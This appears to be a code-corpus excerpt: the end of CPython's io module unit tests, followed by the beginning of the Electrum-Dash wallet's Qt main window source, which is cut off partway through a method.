_to_memoryview(super().read(len_)) def _to_memoryview(buf): '''Convert bytes-object *buf* to a non-trivial memoryview''' arr = array.array('i') idx = len(buf) - len(buf) % arr.itemsize arr.frombytes(buf[:idx]) return memoryview(arr) class CTextIOWrapperTest(TextIOWrapperTest): io = io shutdown_error = "LookupError: unknown encoding: ascii" def test_initialization(self): r = self.BytesIO(b"\xc3\xa9\n\n") b = self.BufferedReader(r, 1000) t = self.TextIOWrapper(b) self.assertRaises(ValueError, t.__init__, b, newline='xyzzy') self.assertRaises(ValueError, t.read) t = self.TextIOWrapper.__new__(self.TextIOWrapper) self.assertRaises(Exception, repr, t) def test_garbage_collection(self): # C TextIOWrapper objects are collected, and collecting them flushes # all data to disk. # The Python version has __del__, so it ends in gc.garbage instead. with support.check_warnings(('', ResourceWarning)): rawio = io.FileIO(support.TESTFN, "wb") b = self.BufferedWriter(rawio) t = self.TextIOWrapper(b, encoding="ascii") t.write("456def") t.x = t wr = weakref.ref(t) del t support.gc_collect() self.assertIsNone(wr(), wr) with self.open(support.TESTFN, "rb") as f: self.assertEqual(f.read(), b"456def") def test_rwpair_cleared_before_textio(self): # Issue 13070: TextIOWrapper's finalization would crash when called # after the reference to the underlying BufferedRWPair's writer got # cleared by the GC. for i in range(1000): b1 = self.BufferedRWPair(self.MockRawIO(), self.MockRawIO()) t1 = self.TextIOWrapper(b1, encoding="ascii") b2 = self.BufferedRWPair(self.MockRawIO(), self.MockRawIO()) t2 = self.TextIOWrapper(b2, encoding="ascii") # circular references t1.buddy = t2 t2.buddy = t1 support.gc_collect() def test_del__CHUNK_SIZE_SystemError(self): t = self.TextIOWrapper(self.BytesIO(), encoding='ascii') with self.assertRaises(AttributeError): del t._CHUNK_SIZE class PyTextIOWrapperTest(TextIOWrapperTest): io = pyio shutdown_error = "LookupError: unknown encoding: ascii" class IncrementalNewlineDecoderTest(unittest.TestCase): def check_newline_decoding_utf8(self, decoder): # UTF-8 specific tests for a newline decoder def _check_decode(b, s, **kwargs): # We exercise getstate() / setstate() as well as decode() state = decoder.getstate() self.assertEqual(decoder.decode(b, **kwargs), s) decoder.setstate(state) self.assertEqual(decoder.decode(b, **kwargs), s) _check_decode(b'\xe8\xa2\x88', "\u8888") _check_decode(b'\xe8', "") _check_decode(b'\xa2', "") _check_decode(b'\x88', "\u8888") _check_decode(b'\xe8', "") _check_decode(b'\xa2', "") _check_decode(b'\x88', "\u8888") _check_decode(b'\xe8', "") self.assertRaises(UnicodeDecodeError, decoder.decode, b'', final=True) decoder.reset() _check_decode(b'\n', "\n") _check_decode(b'\r', "") _check_decode(b'', "\n", final=True) _check_decode(b'\r', "\n", final=True) _check_decode(b'\r', "") _check_decode(b'a', "\na") _check_decode(b'\r\r\n', "\n\n") _check_decode(b'\r', "") _check_decode(b'\r', "\n") _check_decode(b'\na', "\na") _check_decode(b'\xe8\xa2\x88\r\n', "\u8888\n") _check_decode(b'\xe8\xa2\x88', "\u8888") _check_decode(b'\n', "\n") _check_decode(b'\xe8\xa2\x88\r', "\u8888") _check_decode(b'\n', "\n") def check_newline_decoding(self, decoder, encoding): result = [] if encoding is not None: encoder = codecs.getincrementalencoder(encoding)() def _decode_bytewise(s): # Decode one byte at a time for b in encoder.encode(s): result.append(decoder.decode(bytes([b]))) else: encoder = None def _decode_bytewise(s): # Decode one char at a time for c in s: result.append(decoder.decode(c)) self.assertEqual(decoder.newlines, None) _decode_bytewise("abc\n\r") self.assertEqual(decoder.newlines, '\n') _decode_bytewise("\nabc") self.assertEqual(decoder.newlines, ('\n', '\r\n')) _decode_bytewise("abc\r") self.assertEqual(decoder.newlines, ('\n', '\r\n')) _decode_bytewise("abc") self.assertEqual(decoder.newlines, ('\r', '\n', '\r\n')) _decode_bytewise("abc\r") self.assertEqual("".join(result), "abc\n\nabcabc\nabcabc") decoder.reset() input = "abc" if encoder is not None: encoder.reset() input = encoder.encode(input) self.assertEqual(decoder.decode(input), "abc") self.assertEqual(decoder.newlines, None) def test_newline_decoder(self): encodings = ( # None meaning the IncrementalNewlineDecoder takes unicode input # rather than bytes input None, 'utf-8', 'latin-1', 'utf-16', 'utf-16-le', 'utf-16-be', 'utf-32', 'utf-32-le', 'utf-32-be', ) for enc in encodings: decoder = enc and codecs.getincrementaldecoder(enc)() decoder = self.IncrementalNewlineDecoder(decoder, translate=True) self.check_newline_decoding(decoder, enc) decoder = codecs.getincrementaldecoder("utf-8")() decoder = self.IncrementalNewlineDecoder(decoder, translate=True) self.check_newline_decoding_utf8(decoder) self.assertRaises(TypeError, decoder.setstate, 42) def test_newline_bytes(self): # Issue 5433: Excessive optimization in IncrementalNewlineDecoder def _check(dec): self.assertEqual(dec.newlines, None) self.assertEqual(dec.decode("\u0D00"), "\u0D00") self.assertEqual(dec.newlines, None) self.assertEqual(dec.decode("\u0A00"), "\u0A00") self.assertEqual(dec.newlines, None) dec = self.IncrementalNewlineDecoder(None, translate=False) _check(dec) dec = self.IncrementalNewlineDecoder(None, translate=True) _check(dec) def test_translate(self): # issue 35062 for translate in (-2, -1, 1, 2): decoder = codecs.getincrementaldecoder("utf-8")() decoder = self.IncrementalNewlineDecoder(decoder, translate) self.check_newline_decoding_utf8(decoder) decoder = codecs.getincrementaldecoder("utf-8")() decoder = self.IncrementalNewlineDecoder(decoder, translate=0) self.assertEqual(decoder.decode(b"\r\r\n"), "\r\r\n") class CIncrementalNewlineDecoderTest(IncrementalNewlineDecoderTest): pass class PyIncrementalNewlineDecoderTest(IncrementalNewlineDecoderTest): pass # XXX Tests for open() class MiscIOTest(unittest.TestCase): def tearDown(self): support.unlink(support.TESTFN) def test___all__(self): for name in self.io.__all__: obj = getattr(self.io, name, None) self.assertIsNotNone(obj, name) if name in ("open", "open_code"): continue elif "error" in name.lower() or name == "UnsupportedOperation": self.assertTrue(issubclass(obj, Exception), name) elif not name.startswith("SEEK_"): self.assertTrue(issubclass(obj, self.IOBase)) def test_attributes(self): f = self.open(support.TESTFN, "wb", buffering=0) self.assertEqual(f.mode, "wb") f.close() with support.check_warnings(('', DeprecationWarning)): f = self.open(support.TESTFN, "U") self.assertEqual(f.name, support.TESTFN) self.assertEqual(f.buffer.name, support.TESTFN) self.assertEqual(f.buffer.raw.name, support.TESTFN) self.assertEqual(f.mode, "U") self.assertEqual(f.buffer.mode, "rb") self.assertEqual(f.buffer.raw.mode, "rb") f.close() f = self.open(support.TESTFN, "w+") self.assertEqual(f.mode, "w+") self.assertEqual(f.buffer.mode, "rb+") # Does it really matter? self.assertEqual(f.buffer.raw.mode, "rb+") g = self.open(f.fileno(), "wb", closefd=False) self.assertEqual(g.mode, "wb") self.assertEqual(g.raw.mode, "wb") self.assertEqual(g.name, f.fileno()) self.assertEqual(g.raw.name, f.fileno()) f.close() g.close() def test_open_pipe_with_append(self): # bpo-27805: Ignore ESPIPE from lseek() in open(). r, w = os.pipe() self.addCleanup(os.close, r) f = self.open(w, 'a') self.addCleanup(f.close) # Check that the file is marked non-seekable. On Windows, however, lseek # somehow succeeds on pipes. if sys.platform != 'win32': self.assertFalse(f.seekable()) def test_io_after_close(self): for kwargs in [ {"mode": "w"}, {"mode": "wb"}, {"mode": "w", "buffering": 1}, {"mode": "w", "buffering": 2}, {"mode": "wb", "buffering": 0}, {"mode": "r"}, {"mode": "rb"}, {"mode": "r", "buffering": 1}, {"mode": "r", "buffering": 2}, {"mode": "rb", "buffering": 0}, {"mode": "w+"}, {"mode": "w+b"}, {"mode": "w+", "buffering": 1}, {"mode": "w+", "buffering": 2}, {"mode": "w+b", "buffering": 0}, ]: f = self.open(support.TESTFN, **kwargs) f.close() self.assertRaises(ValueError, f.flush) self.assertRaises(ValueError, f.fileno) self.assertRaises(ValueError, f.isatty) self.assertRaises(ValueError, f.__iter__) if hasattr(f, "peek"): self.assertRaises(ValueError, f.peek, 1) self.assertRaises(ValueError, f.read) if hasattr(f, "read1"): self.assertRaises(ValueError, f.read1, 1024) self.assertRaises(ValueError, f.read1) if hasattr(f, "readall"): self.assertRaises(ValueError, f.readall) if hasattr(f, "readinto"): self.assertRaises(ValueError, f.readinto, bytearray(1024)) if hasattr(f, "readinto1"): self.assertRaises(ValueError, f.readinto1, bytearray(1024)) self.assertRaises(ValueError, f.readline) self.assertRaises(ValueError, f.readlines) self.assertRaises(ValueError, f.readlines, 1) self.assertRaises(ValueError, f.seek, 0) self.assertRaises(ValueError, f.tell) self.assertRaises(ValueError, f.truncate) self.assertRaises(ValueError, f.write, b"" if "b" in kwargs['mode'] else "") self.assertRaises(ValueError, f.writelines, []) self.assertRaises(ValueError, next, f) def test_blockingioerror(self): # Various BlockingIOError issues class C(str): pass c = C("") b = self.BlockingIOError(1, c) c.b = b b.c = c wr = weakref.ref(c) del c, b support.gc_collect() self.assertIsNone(wr(), wr) def test_abcs(self): # Test the visible base classes are ABCs. self.assertIsInstance(self.IOBase, abc.ABCMeta) self.assertIsInstance(self.RawIOBase, abc.ABCMeta) self.assertIsInstance(self.BufferedIOBase, abc.ABCMeta) self.assertIsInstance(self.TextIOBase, abc.ABCMeta) def _check_abc_inheritance(self, abcmodule): with self.open(support.TESTFN, "wb", buffering=0) as f: self.assertIsInstance(f, abcmodule.IOBase) self.assertIsInstance(f, abcmodule.RawIOBase) self.assertNotIsInstance(f, abcmodule.BufferedIOBase) self.assertNotIsInstance(f, abcmodule.TextIOBase) with self.open(support.TESTFN, "wb") as f: self.assertIsInstance(f, abcmodule.IOBase) self.assertNotIsInstance(f, abcmodule.RawIOBase) self.assertIsInstance(f, abcmodule.BufferedIOBase) self.assertNotIsInstance(f, abcmodule.TextIOBase) with self.open(support.TESTFN, "w") as f: self.assertIsInstance(f, abcmodule.IOBase) self.assertNotIsInstance(f, abcmodule.RawIOBase) self.assertNotIsInstance(f, abcmodule.BufferedIOBase) self.assertIsInstance(f, abcmodule.TextIOBase) def test_abc_inheritance(self): # Test implementations inherit from their respective ABCs self._check_abc_inheritance(self) def test_abc_inheritance_official(self): # Test implementations inherit from the official ABCs of the # baseline "io" module. self._check_abc_inheritance(io) def _check_warn_on_dealloc(self, *args, **kwargs): f = open(*args, **kwargs) r = repr(f) with self.assertWarns(ResourceWarning) as cm: f = None support.gc_collect() self.assertIn(r, str(cm.warning.args[0])) def test_warn_on_dealloc(self): self._check_warn_on_dealloc(support.TESTFN, "wb", buffering=0) self._check_warn_on_dealloc(support.TESTFN, "wb") self._check_warn_on_dealloc(support.TESTFN, "w") def _check_warn_on_dealloc_fd(self, *args, **kwargs): fds = [] def cleanup_fds(): for fd in fds: try: os.close(fd) except OSError as e: if e.errno != errno.EBADF: raise self.addCleanup(cleanup_fds) r, w = os.pipe() fds += r, w self._check_warn_on_dealloc(r, *args, **kwargs) # When using closefd=False, there's no warning r, w = os.pipe() fds += r, w with support.check_no_resource_warning(self): open(r, *args, closefd=False, **kwargs) def test_warn_on_dealloc_fd(self): self._check_warn_on_dealloc_fd("rb", buffering=0) self._check_warn_on_dealloc_fd("rb") self._check_warn_on_dealloc_fd("r") def test_pickling(self): # Pickling file objects is forbidden for kwargs in [ {"mode": "w"}, {"mode": "wb"}, {"mode": "wb", "buffering": 0}, {"mode": "r"}, {"mode": "rb"}, {"mode": "rb", "buffering": 0}, {"mode": "w+"}, {"mode": "w+b"}, {"mode": "w+b", "buffering": 0}, ]: for protocol in range(pickle.HIGHEST_PROTOCOL + 1): with self.open(support.TESTFN, **kwargs) as f: self.assertRaises(TypeError, pickle.dumps, f, protocol) def test_nonblock_pipe_write_bigbuf(self): self._test_nonblock_pipe_write(16*1024) def test_nonblock_pipe_write_smallbuf(self): self._test_nonblock_pipe_write(1024) @unittest.skipUnless(hasattr(os, 'set_blocking'), 'os.set_blocking() required for this test') def _test_nonblock_pipe_write(self, bufsize): sent = [] received = [] r, w = os.pipe() os.set_blocking(r, False) os.set_blocking(w, False) # To exercise all code paths in the C implementation we need # to play with buffer sizes. For instance, if we choose a # buffer size less than or equal to _PIPE_BUF (4096 on Linux) # then we will never get a partial write of the buffer. rf = self.open(r, mode='rb', closefd=True, buffering=bufsize) wf = self.open(w, mode='wb', closefd=True, buffering=bufsize) with rf, wf: for N in 9999, 73, 7574: try: i = 0 while True: msg = bytes([i % 26 + 97]) * N sent.append(msg) wf.write(msg) i += 1 except self.BlockingIOError as e: self.assertEqual(e.args[0], errno.EAGAIN) self.assertEqual(e.args[2], e.characters_written) sent[-1] = sent[-1][:e.characters_written] received.append(rf.read()) msg = b'BLOCKED' wf.write(msg) sent.append(msg) while True: try: wf.flush() break except self.BlockingIOError as e: self.assertEqual(e.args[0], errno.EAGAIN) self.assertEqual(e.args[2], e.characters_written) self.assertEqual(e.characters_written, 0) received.append(rf.read()) received += iter(rf.read, None) sent, received = b''.join(sent), b''.join(received) self.assertEqual(sent, received) self.assertTrue(wf.closed) self.assertTrue(rf.closed) def test_create_fail(self): # 'x' mode fails if file is existing with self.open(support.TESTFN, 'w'): pass self.assertRaises(FileExistsError, self.open, support.TESTFN, 'x') def test_create_writes(self): # 'x' mode opens for writing with self.open(support.TESTFN, 'xb') as f: f.write(b"spam") with self.open(support.TESTFN, 'rb') as f: self.assertEqual(b"spam", f.read()) def test_open_allargs(self): # there used to be a buffer overflow in the parser for rawmode self.assertRaises(ValueError, self.open, support.TESTFN, 'rwax+') def test_check_encoding_errors(self): # bpo-37388: open() and TextIOWrapper must check encoding and errors # arguments in dev mode mod = self.io.__name__ filename = __file__ invalid = 'Boom, Shaka Laka, Boom!' code = textwrap.dedent(f''' import sys from {mod} import open, TextIOWrapper try: open({filename!r}, encoding={invalid!r}) except LookupError: pass else: sys.exit(21) try: open({filename!r}, errors={invalid!r}) except LookupError: pass else: sys.exit(22) fp = open({filename!r}, "rb") with fp: try: TextIOWrapper(fp, encoding={invalid!r}) except LookupError: pass else: sys.exit(23) try: TextIOWrapper(fp, errors={invalid!r}) except LookupError: pass else: sys.exit(24) sys.exit(10) ''') proc = assert_python_failure('-X', 'dev', '-c', code) self.assertEqual(proc.rc, 10, proc) class CMiscIOTest(MiscIOTest): io = io def test_readinto_buffer_overflow(self): # Issue #18025 class BadReader(self.io.BufferedIOBase): def read(self, n=-1): return b'x' * 10**6 bufio = BadReader() b = bytearray(2) self.assertRaises(ValueError, bufio.readinto, b) def check_daemon_threads_shutdown_deadlock(self, stream_name): # Issue #23309: deadlocks at shutdown should be avoided when a # daemon thread and the main thread both write to a file. code = """if 1: import sys import time import threading from test.support import SuppressCrashReport file = sys.{stream_name} def run(): while True: file.write('.') file.flush() crash = SuppressCrashReport() crash.__enter__() # don't call __exit__(): the crash occurs at Python shutdown thread = threading.Thread(target=run) thread.daemon = True thread.start() time.sleep(0.5) file.write('!') file.flush() """.format_map(locals()) res, _ = run_python_until_end("-c", code) err = res.err.decode() if res.rc != 0: # Failure: should be a fatal error pattern = (r"Fatal Python error: _enter_buffered_busy: " r"could not acquire lock " r"for <(_io\.)?BufferedWriter name='<{stream_name}>'> " r"at interpreter shutdown, possibly due to " r"daemon threads".format_map(locals())) self.assertRegex(err, pattern) else: self.assertFalse(err.strip('.!')) def test_daemon_threads_shutdown_stdout_deadlock(self): self.check_daemon_threads_shutdown_deadlock('stdout') def test_daemon_threads_shutdown_stderr_deadlock(self): self.check_daemon_threads_shutdown_deadlock('stderr') class PyMiscIOTest(MiscIOTest): io = pyio @unittest.skipIf(os.name == 'nt', 'POSIX signals required for this test.') class SignalsTest(unittest.TestCase): def setUp(self): self.oldalrm = signal.signal(signal.SIGALRM, self.alarm_interrupt) def tearDown(self): signal.signal(signal.SIGALRM, self.oldalrm) def alarm_interrupt(self, sig, frame): 1/0 def check_interrupted_write(self, item, bytes, **fdopen_kwargs): """Check that a partial write, when it gets interrupted, properly invokes the signal handler, and bubbles up the exception raised in the latter.""" read_results = [] def _read(): s = os.read(r, 1) read_results.append(s) t = threading.Thread(target=_read) t.daemon = True r, w = os.pipe() fdopen_kwargs["closefd"] = False large_data = item * (support.PIPE_MAX_SIZE // len(item) + 1) try: wio = self.io.open(w, **fdopen_kwargs) if hasattr(signal, 'pthread_sigmask'): # create the thread with SIGALRM signal blocked signal.pthread_sigmask(signal.SIG_BLOCK, [signal.SIGALRM]) t.start() signal.pthread_sigmask(signal.SIG_UNBLOCK, [signal.SIGALRM]) else: t.start() # Fill the pipe enough that the write will be blocking. # It will be interrupted by the timer armed above. Since the # other thread has read one byte, the low-level write will # return with a successful (partial) result rather than an EINTR. # The buffered IO layer must check for pending signal # handlers, which in this case will invoke alarm_interrupt(). signal.alarm(1) try: self.assertRaises(ZeroDivisionError, wio.write, large_data) finally: signal.alarm(0) t.join() # We got one byte, get another one and check that it isn't a # repeat of the first one. read_results.append(os.read(r, 1)) self.assertEqual(read_results, [bytes[0:1], bytes[1:2]]) finally: os.close(w) os.close(r) # This is deliberate. If we didn't close the file descriptor # before closing wio, wio would try to flush its internal # buffer, and block again. try: wio.close() except OSError as e: if e.errno != errno.EBADF: raise def test_interrupted_write_unbuffered(self): self.check_interrupted_write(b"xy", b"xy", mode="wb", buffering=0) def test_interrupted_write_buffered(self): self.check_interrupted_write(b"xy", b"xy", mode="wb") def test_interrupted_write_text(self): self.check_interrupted_write("xy", b"xy", mode="w", encoding="ascii") @support.no_tracing def check_reentrant_write(self, data, **fdopen_kwargs): def on_alarm(*args): # Will be called reentrantly from the same thread wio.write(data) 1/0 signal.signal(signal.SIGALRM, on_alarm) r, w = os.pipe() wio = self.io.open(w, **fdopen_kwargs) try: signal.alarm(1) # Either the reentrant call to wio.write() fails with RuntimeError, # or the signal handler raises ZeroDivisionError. with self.assertRaises((ZeroDivisionError, RuntimeError)) as cm: while 1: for i in range(100): wio.write(data) wio.flush() # Make sure the buffer doesn't fill up and block further writes os.read(r, len(data) * 100) exc = cm.exception if isinstance(exc, RuntimeError): self.assertTrue(str(exc).startswith("reentrant call"), str(exc)) finally: signal.alarm(0) wio.close() os.close(r) def test_reentrant_write_buffered(self): self.check_reentrant_write(b"xy", mode="wb") def test_reentrant_write_text(self): self.check_reentrant_write("xy", mode="w", encoding="ascii") def check_interrupted_read_retry(self, decode, **fdopen_kwargs): """Check that a buffered read, when it gets interrupted (either returning a partial result or EINTR), properly invokes the signal handler and retries if the latter returned successfully.""" r, w = os.pipe() fdopen_kwargs["closefd"] = False def alarm_handler(sig, frame): os.write(w, b"bar") signal.signal(signal.SIGALRM, alarm_handler) try: rio = self.io.open(r, **fdopen_kwargs) os.write(w, b"foo") signal.alarm(1) # Expected behaviour: # - first raw read() returns partial b"foo" # - second raw read() returns EINTR # - third raw read() returns b"bar" self.assertEqual(decode(rio.read(6)), "foobar") finally: signal.alarm(0) rio.close() os.close(w) os.close(r) def test_interrupted_read_retry_buffered(self): self.check_interrupted_read_retry(lambda x: x.decode('latin1'), mode="rb") def test_interrupted_read_retry_text(self): self.check_interrupted_read_retry(lambda x: x, mode="r") def check_interrupted_write_retry(self, item, **fdopen_kwargs): """Check that a buffered write, when it gets interrupted (either returning a partial result or EINTR), properly invokes the signal handler and retries if the latter returned successfully.""" select = support.import_module("select") # A quantity that exceeds the buffer size of an anonymous pipe's # write end. N = support.PIPE_MAX_SIZE r, w = os.pipe() fdopen_kwargs["closefd"] = False # We need a separate thread to read from the pipe and allow the # write() to finish. This thread is started after the SIGALRM is # received (forcing a first EINTR in write()). read_results = [] write_finished = False error = None def _read(): try: while not write_finished: while r in select.select([r], [], [], 1.0)[0]: s = os.read(r, 1024) read_results.append(s) except BaseException as exc: nonlocal error error = exc t = threading.Thread(target=_read) t.daemon = True def alarm1(sig, frame): signal.signal(signal.SIGALRM, alarm2) signal.alarm(1) def alarm2(sig, frame): t.start() large_data = item * N signal.signal(signal.SIGALRM, alarm1) try: wio = self.io.open(w, **fdopen_kwargs) signal.alarm(1) # Expected behaviour: # - first raw write() is partial (because of the limited pipe buffer # and the first alarm) # - second raw write() returns EINTR (because of the second alarm) # - subsequent write()s are successful (either partial or complete) written = wio.write(large_data) self.assertEqual(N, written) wio.flush() write_finished = True t.join() self.assertIsNone(error) self.assertEqual(N, sum(len(x) for x in read_results)) finally: signal.alarm(0) write_finished = True os.close(w) os.close(r) # This is deliberate. If we didn't close the file descriptor # before closing wio, wio would try to flush its internal # buffer, and could block (in case of failure). try: wio.close() except OSError as e: if e.errno != errno.EBADF: raise def test_interrupted_write_retry_buffered(self): self.check_interrupted_write_retry(b"x", mode="wb") def test_interrupted_write_retry_text(self): self.check_interrupted_write_retry("x", mode="w", encoding="latin1") class CSignalsTest(SignalsTest): io = io class PySignalsTest(SignalsTest): io = pyio # Handling reentrancy issues would slow down _pyio even more, so the # tests are disabled. test_reentrant_write_buffered = None test_reentrant_write_text = None def load_tests(*args): tests = (CIOTest, PyIOTest, APIMismatchTest, CBufferedReaderTest, PyBufferedReaderTest, CBufferedWriterTest, PyBufferedWriterTest, CBufferedRWPairTest, PyBufferedRWPairTest, CBufferedRandomTest, PyBufferedRandomTest, StatefulIncrementalDecoderTest, CIncrementalNewlineDecoderTest, PyIncrementalNewlineDecoderTest, CTextIOWrapperTest, PyTextIOWrapperTest, CMiscIOTest, PyMiscIOTest, CSignalsTest, PySignalsTest, ) # Put the namespaces of the IO module we are testing and some useful mock # classes in the __dict__ of each test. mocks = (MockRawIO, MisbehavedRawIO, MockFileIO, CloseFailureIO, MockNonBlockWriterIO, MockUnseekableIO, MockRawIOWithoutRead, SlowFlushRawIO) all_members = io.__all__ + ["IncrementalNewlineDecoder"] c_io_ns = {name : getattr(io, name) for name in all_members} py_io_ns = {name : getattr(pyio, name) for name in all_members} globs = globals() c_io_ns.update((x.__name__, globs["C" + x.__name__]) for x in mocks) py_io_ns.update((x.__name__, globs["Py" + x.__name__]) for x in mocks) # Avoid turning open into a bound method. py_io_ns["open"] = pyio.OpenWrapper for test in tests: if test.__name__.startswith("C"): for name, obj in c_io_ns.items(): setattr(test, name, obj) elif test.__name__.startswith("Py"): for name, obj in py_io_ns.items(): setattr(test, name, obj) suite = unittest.TestSuite([unittest.makeSuite(test) for test in tests]) return suite if __name__ == "__main__": unittest.main()
main_window.py
#!/usr/bin/env python # # Electrum - lightweight Bitcoin client # Copyright (C) 2012 thomasv@gitorious # # Permission is hereby granted, free of charge, to any person # obtaining a copy of this software and associated documentation files # (the "Software"), to deal in the Software without restriction, # including without limitation the rights to use, copy, modify, merge, # publish, distribute, sublicense, and/or sell copies of the Software, # and to permit persons to whom the Software is furnished to do so, # subject to the following conditions: # # The above copyright notice and this permission notice shall be # included in all copies or substantial portions of the Software. # # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, # EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF # MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND # NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS # BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN # ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN # CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE # SOFTWARE. import sys, time, threading import os, json, traceback import shutil import weakref import webbrowser import csv from decimal import Decimal import base64 from functools import partial from PyQt5.QtCore import Qt from PyQt5.QtGui import * from PyQt5.QtWidgets import * from electrum_dash.util import bh2u, bfh from electrum_dash import keystore from electrum_dash.bitcoin import COIN, is_address, TYPE_ADDRESS, NetworkConstants from electrum_dash.plugins import run_hook from electrum_dash.i18n import _ from electrum_dash.util import (format_time, format_satoshis, PrintError, format_satoshis_plain, NotEnoughFunds, UserCancelled) from electrum_dash import Transaction from electrum_dash import util, bitcoin, commands, coinchooser from electrum_dash import paymentrequest from electrum_dash.wallet import Multisig_Wallet from electrum_dash.masternode_manager import MasternodeManager try: from electrum_dash.plot import plot_history except: plot_history = None from .amountedit import AmountEdit, BTCAmountEdit, MyLineEdit from .qrcodewidget import QRCodeWidget, QRDialog from .qrtextedit import ShowQRTextEdit, ScanQRTextEdit from .transaction_dialog import show_transaction from .masternode_dialog import MasternodeDialog from .fee_slider import FeeSlider from .util import * class StatusBarButton(QPushButton): def __init__(self, icon, tooltip, func): QPushButton.__init__(self, icon, '') self.setToolTip(tooltip) self.setFlat(True) self.setMaximumWidth(25) self.clicked.connect(self.onPress) self.func = func self.setIconSize(QSize(25,25)) def onPress(self, checked=False): '''Drops the unwanted PyQt5 "checked" argument''' self.func() def keyPressEvent(self, e): if e.key() == Qt.Key_Return: self.func() from electrum_dash.paymentrequest import PR_PAID class ElectrumWindow(QMainWindow, MessageBoxMixin, PrintError): payment_request_ok_signal = pyqtSignal() payment_request_error_signal = pyqtSignal() notify_transactions_signal = pyqtSignal() new_fx_quotes_signal = pyqtSignal() new_fx_history_signal = pyqtSignal() network_signal = pyqtSignal(str, object) alias_received_signal = pyqtSignal() computing_privkeys_signal = pyqtSignal() show_privkeys_signal = pyqtSignal() def __init__(self, gui_object, wallet): QMainWindow.__init__(self) self.setObjectName("main_window_container") self.wallet = None self.masternode_manager = None self.gui_object = gui_object self.config = config = gui_object.config self.network = gui_object.daemon.network self.fx = gui_object.daemon.fx self.invoices = wallet.invoices self.contacts = wallet.contacts self.tray = gui_object.tray self.app = gui_object.app self.cleaned_up = False self.is_max = False self.payment_request = None self.checking_accounts = False self.qr_window = None self.not_enough_funds = False self.pluginsdialog = None self.require_fee_update = False self.tx_notifications = [] self.tl_windows = [] self.tx_external_keypairs = {} self.create_status_bar() self.need_update = threading.Event() self.decimal_point = config.get('decimal_point', 8) self.fee_unit = config.get('fee_unit', 0) self.num_zeros = int(config.get('num_zeros', 8)) self.completions = QStringListModel() self.tabs = tabs = QTabWidget(self) self.send_tab = self.create_send_tab() self.receive_tab = self.create_receive_tab() self.addresses_tab = self.create_addresses_tab() self.utxo_tab = self.create_utxo_tab() self.console_tab = self.create_console_tab() self.contacts_tab = self.create_contacts_tab() # Disabled until API is stable. # tabs.addTab(self.create_proposals_tab(), _('Budget Proposals')) tabs.setMinimumSize(1020, 500) tabs.setObjectName("main_window_nav_bar") tabs.addTab(self.create_history_tab(), QIcon(":icons/tab_history.png"), _('History')) tabs.addTab(self.send_tab, QIcon(":icons/tab_send.png"), _('Send')) tabs.addTab(self.receive_tab, QIcon(":icons/tab_receive.png"), _('Receive')) def add_optional_tab(tabs, tab, icon, description, name): tab.tab_icon = icon tab.tab_description = description tab.tab_pos = len(tabs) tab.tab_name = name if self.config.get('show_{}_tab'.format(name), False): tabs.addTab(tab, icon, description.replace("&", "")) add_optional_tab(tabs, self.addresses_tab, QIcon(":icons/tab_addresses.png"), _("&Addresses"), "addresses") add_optional_tab(tabs, self.utxo_tab, QIcon(":icons/tab_coins.png"), _("Co&ins"), "utxo") add_optional_tab(tabs, self.contacts_tab, QIcon(":icons/tab_contacts.png"), _("Con&tacts"), "contacts") add_optional_tab(tabs, self.console_tab, QIcon(":icons/tab_console.png"), _("Con&sole"), "console") tabs.setSizePolicy(QSizePolicy.Expanding, QSizePolicy.Expanding) self.setCentralWidget(tabs) if self.config.get("is_maximized"): self.showMaximized() self.setWindowIcon(QIcon(":icons/electrum-dash.png")) self.init_menubar() wrtabs = weakref.proxy(tabs) QShortcut(QKeySequence("Ctrl+W"), self, self.close) QShortcut(QKeySequence("Ctrl+Q"), self, self.close) QShortcut(QKeySequence("Ctrl+R"), self, self.update_wallet) QShortcut(QKeySequence("Ctrl+PgUp"), self, lambda: wrtabs.setCurrentIndex((wrtabs.currentIndex() - 1)%wrtabs.count())) QShortcut(QKeySequence("Ctrl+PgDown"), self, lambda: wrtabs.setCurrentIndex((wrtabs.currentIndex() + 1)%wrtabs.count())) QShortcut(QKeySequence("Ctrl+M"), self, self.show_masternode_dialog) for i in range(wrtabs.count()): QShortcut(QKeySequence("Alt+" + str(i + 1)), self, lambda i=i: wrtabs.setCurrentIndex(i)) self.payment_request_ok_signal.connect(self.payment_request_ok) self.payment_request_error_signal.connect(self.payment_request_error) # self.connect(self, QtCore.SIGNAL('proposals_changed'), self.proposals_changed) self.notify_transactions_signal.connect(self.notify_transactions) self.history_list.setFocus(True) # network callbacks if self.network: self.network_signal.connect(self.on_network_qt) interests = ['updated', 'new_transaction', 'status', 'banner', 'verified', 'fee'] # 'proposals'] # To avoid leaking references to "self" that prevent the # window from being GC-ed when closed, callbacks should be # methods of this class only, and specifically not be # partials, lambdas or methods of subobjects. Hence... self.network.register_callback(self.on_network, interests) # set initial message self.console.showMessage(self.network.banner) self.network.register_callback(self.on_quotes, ['on_quotes']) self.network.register_callback(self.on_history, ['on_history']) self.new_fx_quotes_signal.connect(self.on_fx_quotes) self.new_fx_history_signal.connect(self.on_fx_history) # update fee slider in case we missed the callback self.fee_slider.update() self.load_wallet(wallet) self.connect_slots(gui_object.timer) self.fetch_alias() backup_file = getattr(self.wallet.storage, 'backup_file', None) if backup_file: backup_message = self.wallet.storage.backup_message self.show_warning(backup_message, title=_('Information')) def on_history(self, b): self.new_fx_history_signal.emit() def on_fx_history(self): self.history_list.refresh_headers() self.history_list.update() self.address_list.update() def on_quotes(self, b): self.new_fx_quotes_signal.emit() def on_fx_quotes(self): self.update_status() # Refresh edits with the new rate edit = self.fiat_send_e if self.fiat_send_e.is_last_edited else self.amount_e edit.textEdited.emit(edit.text()) edit = self.fiat_receive_e if self.fiat_receive_e.is_last_edited else self.receive_amount_e edit.textEdited.emit(edit.text()) # History tab needs updating if it used spot if self.fx.history_used_spot: self.history_list.update() def toggle_tab(self, tab): show = not self.config.get('show_{}_tab'.format(tab.tab_name), False) self.config.set_key('show_{}_tab'.format(tab.tab_name), show) item_text = (_("Hide") if show else _("Show")) + " " + tab.tab_description tab.menu_action.setText(item_text) if show: # Find out where to 